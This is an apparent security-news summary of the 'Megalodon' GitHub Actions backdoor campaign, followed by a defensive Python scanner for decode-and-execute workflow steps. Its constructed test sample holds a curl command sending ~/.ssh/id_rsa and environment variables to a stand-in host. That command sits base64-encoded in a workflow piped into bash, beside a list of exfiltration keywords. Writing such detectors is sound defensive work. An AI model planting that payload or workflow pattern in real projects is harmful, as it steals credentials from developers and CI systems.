Megalodon: Mass GitHub Repo Backdooring via CI Workflows
An automated campaign named Megalodon compromised over 5,500 GitHub repositories by injecting malicious commits. The attackers used forged identities to deploy workflows that exfiltrate sensitive information, including cloud credentials and SSH keys. Two variants of the malware were identified, one maximizing automated execution and the other creating dormant backdoors.
- The Megalodon campaign pushed 5,718 malicious commits to 5,561 GitHub repositories in just six hours.
- Attackers used throwaway accounts and forged identities to inject workflows containing base64-encoded bash payloads.
- The campaign exfiltrated various sensitive data, including AWS credentials and SSH private keys.
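Since the injected workflows are described as carrying base64-encoded bash payloads, a quick triage step for a repository owner is to scan the files under `.github/workflows` for run steps that decode a blob and pipe it into a shell, and to decode any long base64 literal and look at what it contains. The Python below is an added example written for this page; it is not SafeDep's tooling and uses no indicators from their report. The detection heuristics, the exfiltration keywords, the `collector.invalid` host and both sample workflows are constructed for illustration.

```python
"""Heuristic scan of GitHub Actions workflow text for decode-and-execute steps.

Added example; heuristics are this script's own assumptions, not published IOCs.
"""
from __future__ import annotations

import base64
import re
import string
from dataclasses import dataclass

# Assumed shape of a decode-and-run step, e.g.
#   echo <b64> | base64 -d | bash      or      bash <(echo <b64> | base64 --decode)
DECODE_EXEC_RE = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b[^\n]*?\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"
    r"|(?:ba|z|da)?sh\s+<\([^\n]*?base64\s+(?:-d|-D|--decode)",
    re.IGNORECASE,
)

# A standalone run of 40+ base64 alphabet characters (with optional padding).
B64_BLOB_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/])")

# Assumed keywords that make a decoded payload worth a human look (all lowercase).
EXFIL_HINTS = (
    "curl ", "wget ", "~/.ssh", "id_rsa", "aws_access_key_id",
    "aws_secret_access_key", "printenv", "env |", "/proc/self/environ", "github_token",
)


@dataclass
class Finding:
    line: int       # 1-based line number in the workflow text
    reason: str     # why the line was flagged
    evidence: str   # the offending line or a preview of the decoded payload


def _try_decode(blob: str) -> str | None:
    """Return the blob decoded as printable UTF-8 text, or None if it is not."""
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(ch in string.printable for ch in text) else None


def scan_workflow(text: str) -> list[Finding]:
    """Scan workflow text line by line; blobs wrapped across YAML lines are not joined."""
    findings: list[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if DECODE_EXEC_RE.search(line):
            findings.append(Finding(lineno, "base64 decode piped into a shell", line.strip()))
        for match in B64_BLOB_RE.finditer(line):
            decoded = _try_decode(match.group(0))
            if decoded is None:
                continue
            hits = [h for h in EXFIL_HINTS if h in decoded.lower()]
            if hits:
                reason = "embedded base64 decodes to script referencing " + ", ".join(hits)
                findings.append(Finding(lineno, reason, decoded.strip()[:120]))
    return findings


# Constructed samples (not artefacts from the campaign). The payload is generated
# at runtime so the base64 literal in the workflow is always well formed.
_PAYLOAD = 'curl -s -X POST https://collector.invalid/in -d "$(cat ~/.ssh/id_rsa; printenv)"\n'
_B64 = base64.b64encode(_PAYLOAD.encode()).decode()

BENIGN_WORKFLOW = """\
name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

MALICIOUS_WORKFLOW = f"""\
name: ci
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Setup
        run: echo {_B64} | base64 -d | bash
"""

if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("malicious", MALICIOUS_WORKFLOW)):
        for f in scan_workflow(wf):
            print(f"[{label}] line {f.line}: {f.reason}\n    {f.evidence}")
```

The decode step matters more than the pattern match: a pipe into `bash` is easy to obfuscate (`eval "$(...)"`, `python -c`, split blobs), while a decoded payload that references SSH keys or AWS variables is hard to explain away. Treat either finding as a prompt to diff the workflow against the last known-good commit and to check who authored it.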
Category: Malware. SafeDep Team, May 21, 2026, 11 min read.
The full article is at SafeDep - Real-time Open Source Software Supply Chain Security.